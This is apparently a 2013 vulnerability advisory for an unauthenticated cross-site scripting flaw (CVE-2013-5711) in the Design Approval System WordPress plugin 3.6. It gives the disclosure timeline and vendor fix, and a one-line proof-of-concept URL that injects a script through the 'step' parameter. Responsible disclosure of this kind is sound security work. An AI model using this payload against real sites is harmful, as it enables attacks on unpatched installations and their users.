[Design-Approval-System Wordpress plugin XSS ]
[vendor product description]
A system to streamline the process of getting designs, photos,
documents, videos or music approved by clients quickly.
[Bug Description]
The walkthrouth web page does not validate the step parameter leading to
a Cross-site scripting flaw. An no authenticated user is required to
exploit these security flaws.
[History]
Advisory sent to vendor on 09/03/2013
Vendor reply 09/03/2013
Vendor patch published 09/07/2013
[Impact]
HIGH
[Afected Version]
3.6
[Vendor Reply]
03/09/2013
07/09/2013 - Vulnerability fixed. 3.7 version released.
[CVE Reference]
CVE-2013-5711
[PoC]
Payload:
http://[host]/wordpress/wp-content/plugins/design-approval-system/admin/walkthrough/walkthrough.php?step=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
[References]
[1] Design Approval System
http://wordpress.org/plugins/design-approval-system
[2] Design Approval System 3.7 release notes
http://wordpress.org/plugins/design-approval-system/other_notes/
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/
--------------------------------------------
iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos
alexos (at) ibliss.com (dot) br [email concealed]
[Greetz]
Ewerson Guimarães - Crash
--
Alexandro Silva
alexandro.silva@xxxxxxxxxxxxx
iBLISS Segurança & Inteligência
+55 71 8847-5385
+55 11 3255-3926
www.ibliss.com.br
